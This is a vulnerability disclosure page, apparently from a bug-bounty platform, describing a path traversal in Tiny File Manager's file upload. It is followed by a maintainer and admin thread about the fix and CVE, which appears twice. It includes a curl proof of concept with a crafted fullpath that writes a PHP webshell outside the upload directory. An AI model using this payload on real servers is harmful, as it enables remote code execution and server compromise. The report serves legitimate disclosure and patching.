Path Traversal in prasathmani/tinyfilemanager

Valid

Reported on

Feb 15th 2022

Description

A Path Traversal vulnerability exists in Tiny File Manager, which allows the upload of files to an arbitrary location in the server. This flaw derives from the way that the file upload/creation is handled when a file with the same name already exists in the target directory.

Affected Code Snippet

// tinyfilemanager.php
// ... snippet ...
if(file_exists ($fullPath) && !$override_file_name) {
       $ext_1 = $ext ? '.'.$ext : '';
       $fullPath = str_replace($ext_1, '', $fullPath) .'_'. date('ymdHis'). $ext_1;
}
// ... snippet ...

If we look at how str_replace is used to separate the old filename from its extension, we can see that it will in fact remove all occurrences of the extension from the whole fullpath parameter. Therefore, if an attacker sends, for example, two consecutive requests with fullpath ...php/...php/...php/...php/...php/var/www/html/benign.php and filename shell.php, it will move the uploaded file to ../../../../../var/www/html/benign_<DATE>.php.

Proof of Concept

curl -s -H 'Cookie: filemanager=<SESSIONID>' -F'file=@shell.php' -F'fullpath=...php/...php/...php/...php/...php/var/www/html/benign.php' <HOST>
curl -s -H 'Cookie: filemanager=<SESSIONID>' -F'file=@shell.php' -F'fullpath=...php/...php/...php/...php/...php/var/www/html/benign.php' <HOST>

Impact

By leveraging this vulnerability to upload a webshell, it's possible to achieve RCE in the server/container.

We are processing your report and will contact the prasathmani/tinyfilemanager team within 24 hours. a year ago

We have contacted a member of the prasathmani/tinyfilemanager team and are waiting to hear back a year ago

We have sent a follow up to the prasathmani/tinyfilemanager team. We will try again in 7 days. a year ago

We have sent a second follow up to the prasathmani/tinyfilemanager team. We will try again in 10 days. a year ago

We have sent a third and final follow up to the prasathmani/tinyfilemanager team. This report is now considered stale. a year ago

Prasath Mani validated this vulnerability a year ago

joaogmauricio has been awarded the disclosure bounty

The fix bounty is now up for grabs

Prasath Mani marked this as fixed in 2.4.7 with commit 154947 a year ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

Prasath Mani

commented a year ago

Maintainer

@joaogmauricio, thanks reporting.

Jamie Slome

commented a year ago

Admin

@prasathmani - thanks for your contributions and effort here! Are you happy for us to assign and publish a CVE for this report?

Jamie Slome

commented a year ago

Admin

@prasathmani - can we also confirm that @joaogmauricio did fix the vulnerability so that we can appropriately represent this on the report and their user profile?

Prasath Mani

commented a year ago

Maintainer

@Jamie, @joaogmauricio - has fixed the issue and CVE report is not required.

Jamie Slome

commented a year ago

Admin

Just for clarity, @joaogmauricio has explicitly requested a CVE - are you happy to publish one, or would you prefer not to?

joaogmauricio

commented a year ago

Researcher

HI @Jamie, thank you very much for your support and for bringing some clarity. Just to be even more clear, the CVE request process would not bring any extra work for @Prasath, correct?

Jamie Slome

commented a year ago

Admin

Correct - we will do all the work! 👍

Prasath Mani

commented a year ago

Maintainer

if CVE is required, please go ahead

Jamie Slome

commented a year ago

Admin

CVE assigned and published 🎊

joaogmauricio

commented a year ago

Researcher

🎊🎊 Thank you very much Prasath and Jamie for your full support. :)

Last question to Jamie (hopefully): how do we stand in regards to the fix attribution? Thanks.

Jamie Slome

commented a year ago

Admin

Also sorted 👍

joaogmauricio

commented a year ago

Researcher

I still see a 0 there, but that's maybe some sort of caching issue. I'll wait some more time and, if not, I'll open a ticket as per your suggestion. Thanks once again and have a great day ahead.

Jamie Slome

commented a year ago

Admin

It was a small bug on our side - deploying a fix for it now 🐞

joaogmauricio

commented a year ago

Researcher

:) Thanks!

to join this conversation

We are processing your report and will contact the prasathmani/tinyfilemanager team within 24 hours. a year ago

We have contacted a member of the prasathmani/tinyfilemanager team and are waiting to hear back a year ago

We have sent a follow up to the prasathmani/tinyfilemanager team. We will try again in 7 days. a year ago

We have sent a second follow up to the prasathmani/tinyfilemanager team. We will try again in 10 days. a year ago

We have sent a third and final follow up to the prasathmani/tinyfilemanager team. This report is now considered stale. a year ago

Prasath Mani validated this vulnerability a year ago

joaogmauricio has been awarded the disclosure bounty

The fix bounty is now up for grabs

Prasath Mani marked this as fixed in 2.4.7 with commit 154947 a year ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

Prasath Mani

commented a year ago

Maintainer

@joaogmauricio, thanks reporting.

Jamie Slome

commented a year ago

Admin

@prasathmani - thanks for your contributions and effort here! Are you happy for us to assign and publish a CVE for this report?

Jamie Slome

commented a year ago

Admin

@prasathmani - can we also confirm that @joaogmauricio did fix the vulnerability so that we can appropriately represent this on the report and their user profile?

Prasath Mani

commented a year ago

Maintainer

@Jamie, @joaogmauricio - has fixed the issue and CVE report is not required.

Jamie Slome

commented a year ago

Admin

Just for clarity, @joaogmauricio has explicitly requested a CVE - are you happy to publish one, or would you prefer not to?

joaogmauricio

commented a year ago

Researcher

HI @Jamie, thank you very much for your support and for bringing some clarity. Just to be even more clear, the CVE request process would not bring any extra work for @Prasath, correct?

Jamie Slome

commented a year ago

Admin

Correct - we will do all the work! 👍

Prasath Mani

commented a year ago

Maintainer

if CVE is required, please go ahead

Jamie Slome

commented a year ago

Admin

CVE assigned and published 🎊

joaogmauricio

commented a year ago

Researcher

🎊🎊 Thank you very much Prasath and Jamie for your full support. :)

Last question to Jamie (hopefully): how do we stand in regards to the fix attribution? Thanks.

Jamie Slome

commented a year ago

Admin

Also sorted 👍

joaogmauricio

commented a year ago

Researcher

I still see a 0 there, but that's maybe some sort of caching issue. I'll wait some more time and, if not, I'll open a ticket as per your suggestion. Thanks once again and have a great day ahead.

Jamie Slome

commented a year ago

Admin

It was a small bug on our side - deploying a fix for it now 🐞

joaogmauricio

commented a year ago

Researcher

:) Thanks!

to join this conversation